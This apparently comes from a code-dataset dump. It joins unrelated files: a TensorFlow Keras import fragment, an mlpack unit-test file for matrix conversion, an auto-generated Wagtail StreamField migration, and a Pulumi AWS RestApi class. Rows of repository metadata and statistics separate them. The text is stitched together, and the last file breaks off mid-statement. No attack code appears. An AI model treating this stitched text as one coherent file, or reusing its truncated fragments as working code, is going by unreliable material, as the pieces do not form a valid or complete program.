from tensorflow.python.keras.losses import binary_crossentropy
from tensorflow.python.keras.losses import categorical_crossentropy
from tensorflow.python.keras.losses import cosine
from tensorflow.python.keras.losses import cosine as cosine_proximity
from tensorflow.python.keras.losses import hinge
from tensorflow.python.keras.losses import poisson
from tensorflow.python.keras.losses import sparse_categorical_crossentropy
from tensorflow.python.keras.losses import squared_hinge
# Metric helpers and (de)serialization entry points.
from tensorflow.python.keras.metrics import binary_accuracy
from tensorflow.python.keras.metrics import categorical_accuracy
from tensorflow.python.keras.metrics import deserialize
from tensorflow.python.keras.metrics import get
from tensorflow.python.keras.metrics import serialize
from tensorflow.python.keras.metrics import sparse_categorical_accuracy
from tensorflow.python.keras.metrics import sparse_top_k_categorical_accuracy
from tensorflow.python.keras.metrics import top_k_categorical_accuracy

# Keep the helper import out of the public namespace.
del print_function
| 49.880952
| 82
| 0.863484
| 299
| 2,095
| 5.926421
| 0.190635
| 0.288939
| 0.349887
| 0.437359
| 0.801354
| 0.795711
| 0.668736
| 0.443002
| 0.154628
| 0
| 0
| 0
| 0.082578
| 2,095
| 41
| 83
| 51.097561
| 0.921956
| 0.068735
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.969697
| 0
| 0.969697
| 0.060606
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
0a5d9e7314088167293d2f96bbc50e82391dfe45
| 9,224
|
py
|
Python
|
src/mlpack/bindings/python/tests/dataset_info_test.py
|
RMaron/mlpack
|
a179a2708d9555ab7ee4b1e90e0c290092edad2e
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 6
|
2015-01-04T04:20:29.000Z
|
2016-07-21T23:30:34.000Z
|
src/mlpack/bindings/python/tests/dataset_info_test.py
|
RMaron/mlpack
|
a179a2708d9555ab7ee4b1e90e0c290092edad2e
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2017-01-23T18:39:30.000Z
|
2021-07-15T13:58:34.000Z
|
src/mlpack/bindings/python/tests/dataset_info_test.py
|
RMaron/mlpack
|
a179a2708d9555ab7ee4b1e90e0c290092edad2e
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2017-01-20T00:54:34.000Z
|
2020-05-16T05:34:32.000Z
|
#!/usr/bin/env python
"""
test_dataset_info.py
Test that to_matrix() and to_matrix_with_info() return the correct types.
mlpack is free software; you may redistribute it and/or modify it under the
terms of the 3-clause BSD license. You should have received a copy of the
3-clause BSD license along with mlpack. If not, see
http://www.opensource.org/licenses/BSD-3-Clause for more information.
"""
import unittest
import pandas as pd
import numpy as np
from mlpack.matrix_utils import to_matrix
from mlpack.matrix_utils import to_matrix_with_info
class TestToMatrix(unittest.TestCase):
    """
    This class defines tests for the to_matrix() and to_matrix_with_info() utility
    functions.
    """

    def testPandasToMatrix(self):
        """
        Test that a simple pandas numeric matrix can be turned into a numpy ndarray.
        """
        d = pd.DataFrame(np.random.randn(100, 4), columns=list('abcd'))
        m, _ = to_matrix(d)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.shape[0], 100)
        self.assertEqual(m.shape[1], 4)
        self.assertEqual(m.dtype, np.dtype(np.double))
        colnames = list('abcd')
        # Every element of m must match the corresponding DataFrame cell.
        for i in range(m.shape[1]):
            for j in range(m.shape[0]):
                self.assertEqual(m[j, i], d[colnames[i]][j])

    def testPandasIntToMatrix(self):
        """
        Test that a matrix holding ints is properly turned into a double matrix.
        """
        d = pd.DataFrame({'a': range(5)})
        m, _ = to_matrix(d)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.shape[0], 5)
        self.assertEqual(m.shape[1], 1)
        for i in range(5):
            self.assertEqual(m[i], i)

    def testPandasMixedToMatrix(self):
        """
        Test that a matrix with one int and one double feature are transformed
        correctly.
        """
        d = pd.DataFrame({'a': range(50)})
        d['b'] = np.random.randn(50, 1)
        # Sanity-check the source dtypes before conversion.
        self.assertEqual(d['a'].dtype, int)
        self.assertEqual(d['b'].dtype, np.dtype(np.double))
        m, _ = to_matrix(d)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.dtype, np.dtype(np.double))
        self.assertEqual(m.shape[0], 50)
        self.assertEqual(m.shape[1], 2)
        colNames = list('ab')
        for i in range(2):
            for j in range(50):
                self.assertEqual(d[colNames[i]][j], m[j, i])

    def testArraylikeToMatrix(self):
        """
        Test that if we pass some array, we get back the right thing. This array
        will be filled with doubles only.
        """
        a = [[0.01, 0.02, 0.03],
             [0.04, 0.05, 0.06],
             [0.07, 0.08, 0.09],
             [0.10, 0.11, 0.12]]
        m, _ = to_matrix(a)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.dtype, np.dtype(np.double))
        self.assertEqual(m.shape[0], 4)
        self.assertEqual(m.shape[1], 3)
        for i in range(4):
            for j in range(3):
                self.assertEqual(a[i][j], m[i, j])

    def testMultitypeArraylikeToMatrix(self):
        """
        Test that if we pass an array with multiple types, we get back the right
        thing. The numpy ndarray should be filled with doubles only.
        """
        a = [[0.01, 0.02, 3],
             [0.04, 0.05, 6],
             [0.07, 0.08, 9],
             [0.10, 0.11, 12]]
        m, _ = to_matrix(a)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.dtype, np.dtype(np.double))
        self.assertEqual(m.shape[0], 4)
        self.assertEqual(m.shape[1], 3)
        for i in range(4):
            for j in range(3):
                self.assertEqual(a[i][j], m[i, j])

    def testNumpyToMatrix(self):
        """
        Make sure we can convert a numpy matrix without copying anything.
        """
        m1 = np.random.randn(100, 5)
        m2, _ = to_matrix(m1)
        self.assertTrue(isinstance(m2, np.ndarray))
        self.assertEqual(m2.dtype, np.dtype(np.double))
        # Comparing the 'data' pointers proves no copy was made.
        p1 = m1.__array_interface__
        p2 = m2.__array_interface__
        self.assertEqual(p1['data'], p2['data'])

    def testPandasToMatrixNoCategorical(self):
        """
        Make sure that if we pass a Pandas dataframe with no categorical features,
        we get back the matrix we expect.
        """
        # NOTE(review): this test has no body, so it passes vacuously.  The
        # implementation appears to be missing — confirm against upstream mlpack
        # and either implement it or remove the stub.
class TestToMatrixWithInfo(unittest.TestCase):
    """
    Tests for the to_matrix_with_info() utility function: numeric conversion
    mirrors to_matrix(), plus a `dims` vector flagging which dimensions are
    categorical (0 = numeric, 1 = categorical).
    """

    def testPandasToMatrix(self):
        """
        Test that a simple pandas numeric matrix can be turned into a numpy ndarray.
        """
        d = pd.DataFrame(np.random.randn(100, 4), columns=list('abcd'))
        m, _, dims = to_matrix_with_info(d, np.double)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.shape[0], 100)
        self.assertEqual(m.shape[1], 4)
        self.assertEqual(m.dtype, np.dtype(np.double))
        colnames = list('abcd')
        for i in range(m.shape[1]):
            for j in range(m.shape[0]):
                self.assertEqual(m[j, i], d[colnames[i]][j])
        # All four dimensions are numeric, so dims must be all zeros.
        # Fixed: was assertTrue(dims.shape[0], 4), which treated `4` as the
        # assertion *message* and always passed.
        self.assertEqual(dims.shape[0], 4)
        self.assertEqual(dims[0], 0)
        self.assertEqual(dims[1], 0)
        self.assertEqual(dims[2], 0)
        self.assertEqual(dims[3], 0)

    def testPandasIntToMatrix(self):
        """
        Test that a matrix holding ints is properly turned into a double matrix.
        """
        d = pd.DataFrame({'a': range(5)})
        m, _, dims = to_matrix_with_info(d, np.double)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.shape[0], 5)
        self.assertEqual(m.shape[1], 1)
        for i in range(5):
            self.assertEqual(m[i], i)
        # Fixed: was assertTrue(dims.shape[0], 1) — same msg-argument pitfall.
        self.assertEqual(dims.shape[0], 1)
        self.assertEqual(dims[0], 0)

    def testPandasMixedToMatrix(self):
        """
        Test that a matrix with one int and one double feature are transformed
        correctly.
        """
        d = pd.DataFrame({'a': range(50)})
        d['b'] = np.random.randn(50, 1)
        self.assertEqual(d['a'].dtype, int)
        self.assertEqual(d['b'].dtype, np.dtype(np.double))
        m, _, dims = to_matrix_with_info(d, np.double)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.dtype, np.dtype(np.double))
        self.assertEqual(m.shape[0], 50)
        self.assertEqual(m.shape[1], 2)
        colNames = list('ab')
        for i in range(2):
            for j in range(50):
                self.assertEqual(d[colNames[i]][j], m[j, i])
        self.assertEqual(dims.shape[0], 2)
        self.assertEqual(dims[0], 0)
        self.assertEqual(dims[1], 0)

    def testArraylikeToMatrix(self):
        """
        Test that if we pass some array, we get back the right thing. This array
        will be filled with doubles only.
        """
        a = [[0.01, 0.02, 0.03],
             [0.04, 0.05, 0.06],
             [0.07, 0.08, 0.09],
             [0.10, 0.11, 0.12]]
        m, _, dims = to_matrix_with_info(a, np.double)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.dtype, np.dtype(np.double))
        self.assertEqual(m.shape[0], 4)
        self.assertEqual(m.shape[1], 3)
        for i in range(4):
            for j in range(3):
                self.assertEqual(a[i][j], m[i, j])
        self.assertEqual(dims.shape[0], 3)
        self.assertEqual(dims[0], 0)
        self.assertEqual(dims[1], 0)
        self.assertEqual(dims[2], 0)

    def testMultitypeArraylikeToMatrix(self):
        """
        Test that if we pass an array with multiple types, we get back the right
        thing. The numpy ndarray should be filled with doubles only.
        """
        a = [[0.01, 0.02, 3],
             [0.04, 0.05, 6],
             [0.07, 0.08, 9],
             [0.10, 0.11, 12]]
        m, _, dims = to_matrix_with_info(a, np.double)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.dtype, np.dtype(np.double))
        self.assertEqual(m.shape[0], 4)
        self.assertEqual(m.shape[1], 3)
        for i in range(4):
            for j in range(3):
                self.assertEqual(a[i][j], m[i, j])
        self.assertEqual(dims.shape[0], 3)
        self.assertEqual(dims[0], 0)
        self.assertEqual(dims[1], 0)
        self.assertEqual(dims[2], 0)

    def testNumpyToMatrix(self):
        """
        Make sure we can convert a numpy matrix without copying anything.
        """
        m1 = np.random.randn(100, 5)
        m2, _, dims = to_matrix_with_info(m1, np.double)
        self.assertTrue(isinstance(m2, np.ndarray))
        self.assertEqual(m2.dtype, np.dtype(np.double))
        # Identical 'data' pointers prove the conversion was zero-copy.
        p1 = m1.__array_interface__
        p2 = m2.__array_interface__
        self.assertEqual(p1['data'], p2['data'])
        self.assertEqual(dims.shape[0], 5)
        self.assertEqual(dims[0], 0)
        self.assertEqual(dims[1], 0)
        self.assertEqual(dims[2], 0)
        self.assertEqual(dims[3], 0)
        self.assertEqual(dims[4], 0)

    def testCategoricalOnly(self):
        """
        Make sure that we can convert a categorical-only Pandas matrix.
        """
        d = pd.DataFrame({"A": ["a", "b", "c", "a"] })
        d["A"] = d["A"].astype('category') # Convert to categorical.
        m, _, dims = to_matrix_with_info(d, np.double)
        self.assertTrue(isinstance(m, np.ndarray))
        self.assertEqual(m.dtype, np.dtype(np.double))
        # The single dimension must be flagged categorical (1).
        self.assertEqual(dims.shape[0], 1)
        self.assertEqual(dims[0], 1)
        self.assertEqual(m.shape[0], 4)
        self.assertEqual(m.shape[1], 1)
        # Equal categories map to equal codes; distinct categories differ.
        self.assertEqual(m[0], m[3])
        self.assertTrue(m[0] != m[1])
        self.assertTrue(m[1] != m[2])
        self.assertTrue(m[0] != m[2])
def test_suite():
    """Build and return a unittest suite covering every test case in this module."""
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    for case in (TestToMatrix, TestToMatrixWithInfo):
        suite.addTest(loader.loadTestsFromTestCase(case))
    return suite
if __name__ == '__main__':
unittest.main()
| 28.915361
| 80
| 0.63389
| 1,406
| 9,224
| 4.095306
| 0.128734
| 0.192775
| 0.100035
| 0.080236
| 0.852032
| 0.82216
| 0.814345
| 0.797499
| 0.786732
| 0.786732
| 0
| 0.043131
| 0.213248
| 9,224
| 318
| 81
| 29.006289
| 0.75031
| 0.202082
| 0
| 0.829787
| 0
| 0
| 0.009757
| 0
| 0
| 0
| 0
| 0
| 0.489362
| 1
| 0.079787
| false
| 0
| 0.026596
| 0
| 0.12234
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6a75206ad45bd5247de3fd4954b7ce63eff28045
| 12,707
|
py
|
Python
|
cms/pages/migrations/0020_auto_20201118_2124.py
|
rkhleics/nhs-ei.website
|
9968916a5c442a2b33003f8a48b238df53ebded0
|
[
"MIT"
] | 1
|
2021-02-04T13:20:31.000Z
|
2021-02-04T13:20:31.000Z
|
cms/pages/migrations/0020_auto_20201118_2124.py
|
rkhleics/nhs-ei.website
|
9968916a5c442a2b33003f8a48b238df53ebded0
|
[
"MIT"
] | 77
|
2020-11-29T23:10:16.000Z
|
2022-03-23T11:47:51.000Z
|
cms/pages/migrations/0020_auto_20201118_2124.py
|
rkhleics/nhs-ei.website
|
9968916a5c442a2b33003f8a48b238df53ebded0
|
[
"MIT"
] | 3
|
2021-03-19T09:23:59.000Z
|
2021-08-31T21:49:36.000Z
|
# Generated by Django 3.1.2 on 2020-11-18 21:24
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.blocks.field_block
import wagtail.core.fields
import wagtail.images.blocks
import wagtailnhsukfrontend.blocks
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations (Django 3.1.2): redefines the
    # ``body`` StreamField of the ``basepage`` model with the full nested
    # wagtail block structure below.
    # NOTE(review): the ``field=`` expression is machine-generated — do not
    # hand-edit it; regenerate from the model definition instead.

    # Must run after the previous auto-generated migration in this app.
    dependencies = [
        ('pages', '0019_auto_20201118_2121'),
    ]

    operations = [
        migrations.AlterField(
            model_name='basepage',
            name='body',
            field=wagtail.core.fields.StreamField([('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('care_card', wagtail.core.blocks.StructBlock([('type', wagtail.core.blocks.ChoiceBlock(choices=[('primary', 'Non-urgent'), ('urgent', 'Urgent'), ('immediate', 'Immediate')])), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('title', wagtail.core.blocks.CharBlock(required=True)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('details', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(required=True)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], required=True))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('grey_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(label='heading', required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], required=True))])), ('details', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(required=True)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], required=True))])), ('do_list', wagtail.core.blocks.StructBlock([('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('label', wagtail.core.blocks.CharBlock(help_text='Adding a label here will overwrite the default of Do', label='Heading', required=False)), ('do', wagtail.core.blocks.ListBlock(wagtail.core.blocks.field_block.RichTextBlock))])), ('dont_list', wagtail.core.blocks.StructBlock([('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('label', wagtail.core.blocks.CharBlock(help_text="Adding a label here will overwrite the default of Don't", label='Heading', required=False)), ('dont', wagtail.core.blocks.ListBlock(wagtail.core.blocks.field_block.RichTextBlock))])), ('expander', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(required=True)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('action_link', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(label='Link text', required=True)), ('external_url', wagtail.core.blocks.URLBlock(label='URL', required=True)), ('new_window', wagtail.core.blocks.BooleanBlock(label='Open in new window', required=False))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('grey_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(label='heading', required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], required=True))])), ('expander_group', wagtail.core.blocks.StructBlock([('expanders', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.ExpanderBlock))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('panel_list', wagtail.core.blocks.StructBlock([('panels', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('left_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('right_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))]))])))])), ('grey_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(label='heading', required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], blank=True),
        ),
    ]
| 529.458333
| 12,224
| 0.760762
| 1,679
| 12,707
| 5.67838
| 0.077427
| 0.171911
| 0.262115
| 0.123348
| 0.934026
| 0.927837
| 0.922383
| 0.917873
| 0.917873
| 0.917873
| 0
| 0.010634
| 0.060124
| 12,707
| 23
| 12,225
| 552.478261
| 0.787658
| 0.003541
| 0
| 0
| 1
| 0.941176
| 0.265719
| 0.001817
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.411765
| 0
| 0.588235
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
6abc52e206bb4245e1f8d68290cf7adefcd045f7
| 71,567
|
py
|
Python
|
sdk/python/pulumi_aws/apigateway/rest_api.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/apigateway/rest_api.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/apigateway/rest_api.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RestApiArgs', 'RestApi']
@pulumi.input_type
class RestApiArgs:
    """Input arguments accepted when constructing a ``RestApi`` resource."""

    def __init__(__self__, *,
                 api_key_source: Optional[pulumi.Input[str]] = None,
                 binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 body: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
                 endpoint_configuration: Optional[pulumi.Input['RestApiEndpointConfigurationArgs']] = None,
                 minimum_compression_size: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 policy: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a RestApi resource.

        Arguments that overlap with an OpenAPI specification imported through
        ``body`` override the corresponding OpenAPI value when both are given.

        :param pulumi.Input[str] api_key_source: Source of the API key for requests; `HEADER` (default) or `AUTHORIZER`. Maps to the `x-amazon-apigateway-api-key-source` OpenAPI extension.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] binary_media_types: Binary media types supported by the REST API; by default only UTF-8-encoded text payloads are supported. Maps to the `x-amazon-apigateway-binary-media-types` extension.
        :param pulumi.Input[str] body: OpenAPI specification defining the set of routes and integrations of the REST API; replaces all REST API configuration except values overridden in this resource.
        :param pulumi.Input[str] description: Description of the REST API; maps to the OpenAPI `info.description` field.
        :param pulumi.Input[bool] disable_execute_api_endpoint: Whether to disable the default `https://{api_id}.execute-api.{region}.amazonaws.com` endpoint so clients must use a custom domain name. Defaults to `false`.
        :param pulumi.Input['RestApiEndpointConfigurationArgs'] endpoint_configuration: Configuration block defining API endpoint configuration including endpoint type. Defined below.
        :param pulumi.Input[int] minimum_compression_size: Minimum response size to compress for the REST API; integer between `-1` (compression disabled, the default) and `10485760` (10MB).
        :param pulumi.Input[str] name: Name of the REST API; maps to the OpenAPI `info.title` field.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of customizations for importing the `body` specification, e.g. set `ignore` equal to `documentation` to exclude DocumentationParts.
        :param pulumi.Input[str] policy: JSON formatted policy document that controls access to the API Gateway; the `apigateway.RestApiPolicy` resource is recommended instead.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags; with a provider-level `default_tags` block, matching keys here overwrite the provider-level values.
        """
        # Register only the arguments the caller actually supplied; the
        # pulumi input-type machinery reads them back through pulumi.get().
        optional_args = (
            ("api_key_source", api_key_source),
            ("binary_media_types", binary_media_types),
            ("body", body),
            ("description", description),
            ("disable_execute_api_endpoint", disable_execute_api_endpoint),
            ("endpoint_configuration", endpoint_configuration),
            ("minimum_compression_size", minimum_compression_size),
            ("name", name),
